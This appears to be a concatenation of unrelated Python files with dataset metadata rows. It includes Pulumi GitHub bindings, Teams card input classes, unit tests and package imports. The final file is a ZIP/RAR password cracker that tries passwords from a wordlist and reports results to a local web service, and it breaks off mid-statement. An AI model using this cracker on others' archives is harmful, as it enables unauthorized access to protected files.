return pulumi.get(self, "allows_public_repositories")
@allows_public_repositories.setter
def allows_public_repositories(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "allows_public_repositories", value)
@property
@pulumi.getter
def default(self) -> Optional[pulumi.Input[bool]]:
"""
Whether this is the default runner group
"""
return pulumi.get(self, "default")
@default.setter
def default(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "default", value)
@property
@pulumi.getter
def etag(self) -> Optional[pulumi.Input[str]]:
"""
An etag representing the runner group object
"""
return pulumi.get(self, "etag")
@etag.setter
def etag(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "etag", value)
@property
@pulumi.getter
def inherited(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the runner group is inherited from the enterprise level
"""
return pulumi.get(self, "inherited")
@inherited.setter
def inherited(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "inherited", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the runner group
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="runnersUrl")
def runners_url(self) -> Optional[pulumi.Input[str]]:
"""
The GitHub API URL for the runner group's runners
"""
return pulumi.get(self, "runners_url")
@runners_url.setter
def runners_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "runners_url", value)
@property
@pulumi.getter(name="selectedRepositoriesUrl")
def selected_repositories_url(self) -> Optional[pulumi.Input[str]]:
"""
Github API URL for the runner group's repositories
"""
return pulumi.get(self, "selected_repositories_url")
@selected_repositories_url.setter
def selected_repositories_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "selected_repositories_url", value)
@property
@pulumi.getter(name="selectedRepositoryIds")
def selected_repository_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[int]]]]:
"""
IDs of the repositories which should be added to the runner group
"""
return pulumi.get(self, "selected_repository_ids")
@selected_repository_ids.setter
def selected_repository_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]]):
pulumi.set(self, "selected_repository_ids", value)
@property
@pulumi.getter
def visibility(self) -> Optional[pulumi.Input[str]]:
"""
Visibility of a runner group. Whether the runner group can include `all`, `selected`, or `private` repositories. A value of `private` is not currently supported due to limitations in the GitHub API.
"""
return pulumi.get(self, "visibility")
@visibility.setter
def visibility(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "visibility", value)
class ActionsRunnerGroup(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
name: Optional[pulumi.Input[str]] = None,
selected_repository_ids: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,
visibility: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
This resource allows you to create and manage GitHub Actions runner groups within your GitHub enterprise organizations.
You must have admin access to an organization to use this resource.
## Example Usage
```python
import pulumi
import pulumi_github as github
example_repository = github.Repository("exampleRepository")
example_actions_runner_group = github.ActionsRunnerGroup("exampleActionsRunnerGroup",
visibility="selected",
selected_repository_ids=[example_repository.repo_id])
```
## Import
This resource can be imported using the ID of the runner group
```sh
$ pulumi import github:index/actionsRunnerGroup:ActionsRunnerGroup test 7
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] name: Name of the runner group
:param pulumi.Input[Sequence[pulumi.Input[int]]] selected_repository_ids: IDs of the repositories which should be added to the runner group
:param pulumi.Input[str] visibility: Visibility of a runner group. Whether the runner group can include `all`, `selected`, or `private` repositories. A value of `private` is not currently supported due to limitations in the GitHub API.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ActionsRunnerGroupArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This resource allows you to create and manage GitHub Actions runner groups within your GitHub enterprise organizations.
You must have admin access to an organization to use this resource.
## Example Usage
```python
import pulumi
import pulumi_github as github
example_repository = github.Repository("exampleRepository")
example_actions_runner_group = github.ActionsRunnerGroup("exampleActionsRunnerGroup",
visibility="selected",
selected_repository_ids=[example_repository.repo_id])
```
## Import
This resource can be imported using the ID of the runner group
```sh
$ pulumi import github:index/actionsRunnerGroup:ActionsRunnerGroup test 7
```
:param str resource_name: The name of the resource.
:param ActionsRunnerGroupArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ActionsRunnerGroupArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
name: Optional[pulumi.Input[str]] = None,
selected_repository_ids: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,
visibility: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ActionsRunnerGroupArgs.__new__(ActionsRunnerGroupArgs)
__props__.__dict__["name"] = name
__props__.__dict__["selected_repository_ids"] = selected_repository_ids
if visibility is None and not opts.urn:
raise TypeError("Missing required property 'visibility'")
__props__.__dict__["visibility"] = visibility
__props__.__dict__["allows_public_repositories"] = None
__props__.__dict__["default"] = None
__props__.__dict__["etag"] = None
__props__.__dict__["inherited"] = None
__props__.__dict__["runners_url"] = None
__props__.__dict__["selected_repositories_url"] = None
super(ActionsRunnerGroup, __self__).__init__(
'github:index/actionsRunnerGroup:ActionsRunnerGroup',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
allows_public_repositories: Optional[pulumi.Input[bool]] = None,
default: Optional[pulumi.Input[bool]] = None,
etag: Optional[pulumi.Input[str]] = None,
inherited: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
runners_url: Optional[pulumi.Input[str]] = None,
selected_repositories_url: Optional[pulumi.Input[str]] = None,
selected_repository_ids: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,
visibility: Optional[pulumi.Input[str]] = None) -> 'ActionsRunnerGroup':
"""
Get an existing ActionsRunnerGroup resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] allows_public_repositories: Whether public repositories can be added to the runner group
:param pulumi.Input[bool] default: Whether this is the default runner group
:param pulumi.Input[str] etag: An etag representing the runner group object
:param pulumi.Input[bool] inherited: Whether the runner group is inherited from the enterprise level
:param pulumi.Input[str] name: Name of the runner group
:param pulumi.Input[str] runners_url: The GitHub API URL for the runner group's runners
:param pulumi.Input[str] selected_repositories_url: Github API URL for the runner group's repositories
:param pulumi.Input[Sequence[pulumi.Input[int]]] selected_repository_ids: IDs of the repositories which should be added to the runner group
:param pulumi.Input[str] visibility: Visibility of a runner group. Whether the runner group can include `all`, `selected`, or `private` repositories. A value of `private` is not currently supported due to limitations in the GitHub API.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ActionsRunnerGroupState.__new__(_ActionsRunnerGroupState)
__props__.__dict__["allows_public_repositories"] = allows_public_repositories
__props__.__dict__["default"] = default
__props__.__dict__["etag"] = etag
__props__.__dict__["inherited"] = inherited
__props__.__dict__["name"] = name
__props__.__dict__["runners_url"] = runners_url
__props__.__dict__["selected_repositories_url"] = selected_repositories_url
__props__.__dict__["selected_repository_ids"] = selected_repository_ids
__props__.__dict__["visibility"] = visibility
return ActionsRunnerGroup(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="allowsPublicRepositories")
def allows_public_repositories(self) -> pulumi.Output[bool]:
"""
Whether public repositories can be added to the runner group
"""
return pulumi.get(self, "allows_public_repositories")
@property
@pulumi.getter
def default(self) -> pulumi.Output[bool]:
"""
Whether this is the default runner group
"""
return pulumi.get(self, "default")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
An etag representing the runner group object
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def inherited(self) -> pulumi.Output[bool]:
"""
Whether the runner group is inherited from the enterprise level
"""
return pulumi.get(self, "inherited")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the runner group
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="runnersUrl")
def runners_url(self) -> pulumi.Output[str]:
"""
The GitHub API URL for the runner group's runners
"""
return pulumi.get(self, "runners_url")
@property
@pulumi.getter(name="selectedRepositoriesUrl")
def selected_repositories_url(self) -> pulumi.Output[str]:
"""
Github API URL for the runner group's repositories
"""
return pulumi.get(self, "selected_repositories_url")
@property
@pulumi.getter(name="selectedRepositoryIds")
def selected_repository_ids(self) -> pulumi.Output[Optional[Sequence[int]]]:
"""
IDs of the repositories which should be added to the runner group
"""
return pulumi.get(self, "selected_repository_ids")
@property
@pulumi.getter
def visibility(self) -> pulumi.Output[str]:
"""
Visibility of a runner group. Whether the runner group can include `all`, `selected`, or `private` repositories. A value of `private` is not currently supported due to limitations in the GitHub API.
"""
return pulumi.get(self, "visibility")
| 43.779249 | 243 | 0.662818 | 2,277 | 19,832 | 5.552481 | 0.081247 | 0.080044 | 0.072135 | 0.046983 | 0.816657 | 0.779325 | 0.723879 | 0.702207 | 0.689314 | 0.660682 | 0 | 0.0002 | 0.242739 | 19,832 | 452 | 244 | 43.876106 | 0.841657 | 0.33577 | 0 | 0.566802 | 1 | 0 | 0.108146 | 0.06149 | 0 | 0 | 0 | 0 | 0 | 1 | 0.161943 | false | 0.004049 | 0.020243 | 0 | 0.283401 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8dd4b763993c043f4b03fb0869ea15c704818756 | 201 | py | Python | multifil/aws/__init__.py | travistune3/multifil | 6e2a5d68dbdd7c7b5b6e50bdba92e6f7de3331fb | [
"MIT"
] | 1 | 2020-04-02T17:01:41.000Z | 2020-04-02T17:01:41.000Z | multifil/aws/__init__.py | travistune3/multifil | 6e2a5d68dbdd7c7b5b6e50bdba92e6f7de3331fb | [
"MIT"
] | null | null | null | multifil/aws/__init__.py | travistune3/multifil | 6e2a5d68dbdd7c7b5b6e50bdba92e6f7de3331fb | [
"MIT"
] | 2 | 2020-03-19T23:45:25.000Z | 2021-04-05T17:20:18.000Z | from multifil.aws.run import manage
from multifil.aws.metas import emit
from multifil.utilities import use_aws
if use_aws:
from .instance import queue_eater
from .cluster import watch_cluster
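The `use_aws` flag above gates imports that only make sense when AWS support is enabled. A similar guard can be written against module availability with `importlib.util.find_spec`; a small sketch (`sqlite3` here is just a stand-in for any optional dependency):

```python
import importlib.util

# Optional-import guard in the spirit of the use_aws gate above: only pull in
# a feature module when the environment actually provides it.
HAS_SQLITE = importlib.util.find_spec("sqlite3") is not None

if HAS_SQLITE:
    import sqlite3
    backend = sqlite3.sqlite_version  # feature path: report the library version
else:
    backend = "unavailable"  # graceful fallback when the module is missing

print(backend)
```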
| 25.125 | 38 | 0.80597 | 31 | 201 | 5.096774 | 0.516129 | 0.227848 | 0.189873 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.154229 | 201 | 7 | 39 | 28.714286 | 0.929412 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.833333 | 0 | 0.833333 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5c17a3e8245b6ed20f17a4cd87b77cdb4d845703 | 4,942 | py | Python | msteamswebhook/inputs.py | mviniciusleal/msteamswebhook | dfcd1407e296fc5e7ca423853053f679cf625cda | [
"MIT"
] | null | null | null | msteamswebhook/inputs.py | mviniciusleal/msteamswebhook | dfcd1407e296fc5e7ca423853053f679cf625cda | [
"MIT"
] | null | null | null | msteamswebhook/inputs.py | mviniciusleal/msteamswebhook | dfcd1407e296fc5e7ca423853053f679cf625cda | [
"MIT"
] | null | null | null | from msteamswebhook.base import *
from typing import Union, List, Dict
class Input_ChoiceSet(Input):
_type = "Input.ChoiceSet"
def __init__(self,
id: str,
choices: List[Input_Choice],
isMultiSelect: bool=None,
style: ChoiceInputStyle=None,
value: str=None,
placeholder: str=None,
wrap: bool=None,
#Input
errorMessage: str=None,
isRequired: bool=None,
label: str=None,
fallback: Union[IElement, FallbackOption]=None,
height: BlockElementHeight=None,
separator: bool=None,
spacing: Spacing=None,
isVisible: bool=None,
additionalProperties: Dict=None
):
super().__init__(id, errorMessage, isRequired, label, fallback, height, separator, spacing, isVisible, additionalProperties)
self._choices = choices
self._isMultiSelect = isMultiSelect
self._style = style
self._value = value
self._placeholder = placeholder
self._wrap = wrap
class Input_Date(Input):
_type = "Input.Date"
def __init__(self,
id: str,
max: str=None,
min: str=None,
placeholder: str=None,
value: str=None,
#Input
errorMessage: str=None,
isRequired: bool=None,
label: str=None,
fallback: Union[IElement, FallbackOption]=None,
height: BlockElementHeight=None,
separator: bool=None,
spacing: Spacing=None,
isVisible: bool=None,
additionalProperties: Dict=None
):
super().__init__(id, errorMessage, isRequired, label, fallback, height, separator, spacing, isVisible, additionalProperties)
self._max = max
self._min = min
self._placeholder = placeholder
self._value = value
class Input_Number(Input):
_type = "Input.Number"
def __init__(self,
id: str,
max: int=None,
min: int=None,
placeholder: str=None,
value: int=None,
#Input
errorMessage: str=None,
isRequired: bool=None,
label: str=None,
fallback: Union[IElement, FallbackOption]=None,
height: BlockElementHeight=None,
separator: bool=None,
spacing: Spacing=None,
isVisible: bool=None,
additionalProperties: Dict=None
):
super().__init__(id, errorMessage, isRequired, label, fallback, height, separator, spacing, isVisible, additionalProperties)
self._max = max
self._min = min
self._placeholder = placeholder
self._value = value
class Input_Text(Input):
_type = "Input.Text"
def __init__(self,
id: str,
isMultiline: bool=None,
maxLength: int=None,
placeholder: str=None,
regex: str=None,
style: TextInputStyle=None,
inlineAction: SelectAction=None,
value: str=None,
#Input
errorMessage: str=None,
isRequired: bool=None,
label: str=None,
fallback: Union[IElement, FallbackOption]=None,
height: BlockElementHeight=None,
separator: bool=None,
spacing: Spacing=None,
isVisible: bool=None,
additionalProperties: Dict=None
):
super().__init__(id, errorMessage, isRequired, label, fallback, height, separator, spacing, isVisible, additionalProperties)
self._isMultiline = isMultiline
self._maxLength = maxLength
self._placeholder = placeholder
self._regex = regex
self._style = style
self._inlineAction = inlineAction
self._value = value
class Input_Time(Input):
_type = "Input.Time"
def __init__(self,
id: str,
max: str=None,
min: str=None,
placeholder: str=None,
value: str=None,
#Input
errorMessage: str=None,
isRequired: bool=None,
label: str=None,
fallback: Union[IElement, FallbackOption]=None,
height: BlockElementHeight=None,
separator: bool=None,
spacing: Spacing=None,
isVisible: bool=None,
additionalProperties: Dict=None
):
super().__init__(id, errorMessage, isRequired, label, fallback, height, separator, spacing, isVisible, additionalProperties)
self._max = max
self._min = min
self._placeholder = placeholder
self._value = value
class Input_Toggle(Input):
_type = "Input.Toggle"
def __init__(self,
id: str,
title: str,
value: str=None,
valueOff: str=None,
valueOn: str=None,
wrap: bool=None,
#Input
errorMessage: str=None,
isRequired: bool=None,
label: str=None,
fallback: Union[IElement, FallbackOption]=None,
height: BlockElementHeight=None,
separator: bool=None,
spacing: Spacing=None,
isVisible: bool=None,
additionalProperties: Dict=None
):
super().__init__(id, errorMessage, isRequired, label, fallback, height, separator, spacing, isVisible, additionalProperties)
self._title = title
self._value = value
self._valueOff = valueOff
self._valueOn = valueOn
self._wrap = wrap
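Each `Input_*` class above stores its constructor arguments on underscore-prefixed attributes next to a `_type` class attribute. A hypothetical serializer for objects of that shape could emit `_type` as `type` and strip the prefix from every non-`None` attribute (the real library's serialization may differ):

```python
# Hypothetical serializer for classes shaped like the Input_* types above:
# emit "_type" as "type" and every non-None "_"-prefixed attribute without
# its prefix, skipping fields the caller left unset.
class InputToggleSketch:
    _type = "Input.Toggle"

    def __init__(self, id, title, value=None, wrap=None):
        self._id = id
        self._title = title
        self._value = value
        self._wrap = wrap


def to_payload(element):
    payload = {"type": element._type}
    for name, val in vars(element).items():
        if name.startswith("_") and val is not None:
            payload[name.lstrip("_")] = val
    return payload


toggle = InputToggleSketch(id="accept", title="Accept terms", value="false")
print(to_payload(toggle))
# {'type': 'Input.Toggle', 'id': 'accept', 'title': 'Accept terms', 'value': 'false'}
```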
| 28.900585 | 132 | 0.648928 | 514 | 4,942 | 6.062257 | 0.110895 | 0.065148 | 0.026958 | 0.025032 | 0.758665 | 0.712131 | 0.706033 | 0.706033 | 0.706033 | 0.706033 | 0 | 0 | 0.250708 | 4,942 | 170 | 133 | 29.070588 | 0.84148 | 0.007082 | 0 | 0.756579 | 0 | 0 | 0.014082 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039474 | false | 0 | 0.013158 | 0 | 0.131579 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5c1dd0fa3d116b6293aedfa20eacc198cb70f438 | 130 | py | Python | pyfileconf/exceptions/config.py | nickderobertis/py-file-conf | 100773b86373035a5b485a1ed96d8f5a1d69d066 | [
"MIT"
] | 2 | 2020-11-29T19:09:14.000Z | 2021-09-11T19:21:21.000Z | pyfileconf/exceptions/config.py | nickderobertis/py-file-conf | 100773b86373035a5b485a1ed96d8f5a1d69d066 | [
"MIT"
] | 47 | 2020-02-01T03:54:07.000Z | 2022-01-13T02:24:45.000Z | pyfileconf/exceptions/config.py | nickderobertis/py-file-conf | 100773b86373035a5b485a1ed96d8f5a1d69d066 | [
"MIT"
] | null | null | null |
class ConfigManagerNotLoadedException(Exception):
pass
class CannotResolveConfigDependenciesException(Exception):
pass
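Distinct exception classes like these let callers react to each failure mode separately. A brief usage sketch (`get_config` and its `loaded` flag are hypothetical; only the exception name mirrors the code above):

```python
class ConfigManagerNotLoadedException(Exception):
    pass


def get_config(loaded):
    # Raise the specific exception so callers can handle this case distinctly
    # from other config errors.
    if not loaded:
        raise ConfigManagerNotLoadedException("call load() before get_config()")
    return {"key": "value"}


try:
    get_config(loaded=False)
except ConfigManagerNotLoadedException as exc:
    print(f"config error: {exc}")  # config error: call load() before get_config()
```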
| 16.25 | 58 | 0.823077 | 8 | 130 | 13.375 | 0.625 | 0.242991 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130769 | 130 | 7 | 59 | 18.571429 | 0.946903 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 0 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
5c2b789751c6586c849663183fd84073f92cbc40 | 2,840 | py | Python | emorobot/monitor/tests/test_grouping_tests.py | cudaczek/emorobot-django | 7637d6702df2a4ca41b6e4d51e727f910dcf9050 | [
"MIT"
] | null | null | null | emorobot/monitor/tests/test_grouping_tests.py | cudaczek/emorobot-django | 7637d6702df2a4ca41b6e4d51e727f910dcf9050 | [
"MIT"
] | 4 | 2020-01-28T23:10:41.000Z | 2022-02-10T00:37:39.000Z | emorobot/monitor/tests/test_grouping_tests.py | cudaczek/emorobot-django | 7637d6702df2a4ca41b6e4d51e727f910dcf9050 | [
"MIT"
] | null | null | null | from unittest import TestCase
from django.apps import apps
AUDIO_CLASSIFIER = apps.get_app_config('monitor').audio_classifier
VIDEO_CLASSIFIER = apps.get_app_config('monitor').video_classifier
# using own emotions groups
class VideoGroupTestCase(TestCase):
def test_group_classical(self):
results = [0.11, 0.44, 0.45]
labels = ["sad", "happy", "angry"]
values, category_names = VIDEO_CLASSIFIER.group(results, labels)
categories = {x[1]: x[0] for x in zip(values, category_names)}
result = {"negative": 0.11 + 0.45, "positive": 0.44, "other": 0.0, "neutral": 0.0}
self.assertDictEqual(categories, result)
def test_group_no_existing_emotion(self):
results = [0.11, 0.44, 0.45]
labels = ["excited", "happy", "angry"]
values, category_names = VIDEO_CLASSIFIER.group(results, labels)
categories = {x[1]: x[0] for x in zip(values, category_names)}
result = {"negative": 0.45, "positive": 0.44, "other": 0.11, "neutral": 0.0}
self.assertDictEqual(categories, result)
def test_group_no_existing_emotion_in_own_dict_but_in_global(self):
results = [0.11, 0.44, 0.45]
labels = ["male_sad", "female_happy", "male_angry"]
values, category_names = VIDEO_CLASSIFIER.group(results, labels)
categories = {x[1]: x[0] for x in zip(values, category_names)}
result = {"negative": 0.0, "positive": 0.0, "other": 1.0, "neutral": 0.0}
self.assertDictEqual(categories, result)
# using global emotional dictionary
class AudioGroupTestCase(TestCase):
def test_group_classical(self):
results = [0.11, 0.44, 0.45]
labels = ["sad", "happy", "angry"]
values, category_names = AUDIO_CLASSIFIER.group(results, labels)
categories = {x[1]: x[0] for x in zip(values, category_names)}
result = {"negative": 0.45 + 0.11, "positive": 0.44, "other": 0.0, "neutral": 0.0}
self.assertDictEqual(categories, result)
def test_group_one_no_existing_emotion(self):
results = [0.11, 0.44, 0.45]
labels = ["excited", "male_happy", "female_angry"]
values, category_names = AUDIO_CLASSIFIER.group(results, labels)
categories = {x[1]: x[0] for x in zip(values, category_names)}
result = {"negative": 0.45, "positive": 0.44, "other": 0.11, "neutral": 0.0}
self.assertDictEqual(categories, result)
def test_group_all_no_existing_emotions_in_global_dict(self):
results = [0.11, 0.44, 0.45]
labels = ["excited", "scared", "tired"]
values, category_names = AUDIO_CLASSIFIER.group(results, labels)
categories = {x[1]: x[0] for x in zip(values, category_names)}
result = {"negative": 0.0, "positive": 0.0, "other": 1.0, "neutral": 0.0}
self.assertDictEqual(categories, result)
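Both test classes exercise a `group(results, labels)` method that buckets per-emotion scores into negative/positive/other/neutral. A hypothetical implementation consistent with the expectations above (the real classifiers' label tables are larger and may differ):

```python
# Hypothetical group() consistent with the tests above: known emotion labels
# map to a sentiment bucket, and anything unrecognized is counted as "other".
CATEGORY_OF = {"sad": "negative", "angry": "negative", "happy": "positive"}
CATEGORIES = ["negative", "positive", "other", "neutral"]


def group(results, labels):
    totals = {name: 0.0 for name in CATEGORIES}
    for score, label in zip(results, labels):
        totals[CATEGORY_OF.get(label, "other")] += score
    return [totals[name] for name in CATEGORIES], CATEGORIES


values, names = group([0.11, 0.44, 0.45], ["sad", "happy", "angry"])
print(dict(zip(names, values)))
```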
| 47.333333 | 90 | 0.648592 | 387 | 2,840 | 4.599483 | 0.165375 | 0.094382 | 0.12809 | 0.047191 | 0.833146 | 0.833146 | 0.796067 | 0.794382 | 0.794382 | 0.779775 | 0 | 0.057548 | 0.204577 | 2,840 | 59 | 91 | 48.135593 | 0.730412 | 0.020775 | 0 | 0.666667 | 0 | 0 | 0.108711 | 0 | 0 | 0 | 0 | 0 | 0.125 | 1 | 0.125 | false | 0 | 0.041667 | 0 | 0.208333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
30f6e1d7cf19b0fc37d90373fc5970feb66ccd87 | 355 | py | Python | rlcard/games/wizard_trickpreds/__init__.py | MagnusWagner/rlcard | 1a3aaef76e78968ebc68eb5b92e57be4709f7e38 | [
"MIT"
] | null | null | null | rlcard/games/wizard_trickpreds/__init__.py | MagnusWagner/rlcard | 1a3aaef76e78968ebc68eb5b92e57be4709f7e38 | [
"MIT"
] | null | null | null | rlcard/games/wizard_trickpreds/__init__.py | MagnusWagner/rlcard | 1a3aaef76e78968ebc68eb5b92e57be4709f7e38 | [
"MIT"
] | null | null | null | from rlcard.games.wizard_trickpreds.dealer import WizardDealer as Dealer
from rlcard.games.wizard_trickpreds.judger import WizardJudger as Judger
from rlcard.games.wizard_trickpreds.player import WizardPlayer as Player
from rlcard.games.wizard_trickpreds.card import WizardCard as Card
from rlcard.games.wizard_trickpreds.game import WizardGame as Game
| 44.375 | 72 | 0.867606 | 50 | 355 | 6.06 | 0.34 | 0.165017 | 0.247525 | 0.346535 | 0.511551 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090141 | 355 | 7 | 73 | 50.714286 | 0.938081 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
eb79f54201bb85afed3ab6e85715f334739a21cd | 3,225 | py | Python | app.py | erfansaberi/CFC_Compressed_files_cracker | f07ef9f80c0f86034665afdd32cc25a4688f8789 | [
"MIT"
] | 1 | 2020-10-23T10:52:55.000Z | 2020-10-23T10:52:55.000Z | app.py | erfansaberi/CFC-Compressed-files-cracker | f07ef9f80c0f86034665afdd32cc25a4688f8789 | [
"MIT"
] | null | null | null | app.py | erfansaberi/CFC-Compressed-files-cracker | f07ef9f80c0f86034665afdd32cc25a4688f8789 | [
"MIT"
] | null | null | null | from zipfile import ZipFile
from rarfile import RarFile
import os
import sys
import requests
numpasswords = 0
def crackzip(filepath,passwd):
i = 0
with ZipFile(filepath, 'r') as zipObj:
for password in passwd:
i += 1
try:
zipObj.extractall(path='./extractedfile', members=None, pwd=password.rstrip('\n').encode())
print('\n===================')
print('zip file extracted!')
print('===================\n')
requests.get(f'http://localhost:5000/recieve?status=extracted&password={password}&processid={processid}')
return ''
except:
pass
try:
if i%20 == 0:
requests.get(f'http://localhost:5000/progress?processid={processid}&numpasswords={numpasswords}&testedpasswords={i}')
except Exception as e:
requests.get(f'http://localhost:5000/errors?error={e}')
requests.get('http://localhost:5000/recieve?status=failed')
requests.get(f'http://localhost:5000/progress?processid={processid}&numpasswords={numpasswords}&testedpasswords={i}')
def crackrar(filepath,passwd):
i = 0
with RarFile(filepath,'r') as rarObj:
for password in passwd:
i += 1
try:
rarObj.extractall(path='./extractedfile', members=None, pwd=password.rstrip('\n'))
print('\n===================')
print('rar file extracted!')
print('===================\n')
requests.get(f'http://localhost:5000/recieve?status=extracted&password={password}&processid={processid}')
return ''
except:
pass
try:
if i%20 == 0:
requests.get(f'http://localhost:5000/progress?processid={processid}&numpasswords={numpasswords}&testedpasswords={i}')
except Exception as e:
requests.get(f'http://localhost:5000/errors?error={e}')
requests.get('http://localhost:5000/recieve?status=failed')
requests.get(f'http://localhost:5000/progress?processid={processid}&numpasswords={numpasswords}&testedpasswords={i}')
def getnumpasswords(passpath):
num = 0
with open(passpath,'r') as passlist:
for line in passlist:
num += 1
return num
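`crackzip` and `crackrar` above share one loop shape: walk the candidate list, attempt extraction, and report progress every 20 tries. That shape can be factored into a generic helper (a sketch; `try_password` stands in for the archive-specific extraction attempt):

```python
# Generic sketch of the candidate-testing loop used by crackzip/crackrar:
# the archive-specific work is abstracted into try_password, and a progress
# callback fires every `every` attempts (mirroring the i % 20 checks above).
def brute_force(passwords, try_password, on_progress, every=20):
    for i, candidate in enumerate(passwords, start=1):
        if try_password(candidate.rstrip("\n")):
            return candidate.rstrip("\n")  # found the password
        if i % every == 0:
            on_progress(i)  # periodic progress report
    return None  # exhausted the list without success


progress = []
found = brute_force(
    ["wrong%d\n" % n for n in range(30)] + ["secret\n"],
    try_password=lambda p: p == "secret",
    on_progress=progress.append,
)
print(found, progress)  # secret [20]
```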
try:
zippath = sys.argv[2]
passpath = sys.argv[1]
processid = sys.argv[3]
if os.path.splitext(zippath)[1] == '.zip':
numpasswords = getnumpasswords(passpath)
requests.get(f'http://localhost:5000/start?processid={processid}&numpasswords={numpasswords}')
passwd = open(passpath)
crackzip(zippath,passwd)
passwd.close()
elif os.path.splitext(zippath)[1] == '.rar':
numpasswords = getnumpasswords(passpath)
requests.get(f'http://localhost:5000/start?processid={processid}&numpasswords={numpasswords}')
passwd = open(passpath)
crackrar(zippath,passwd)
passwd.close()
except Exception as e:
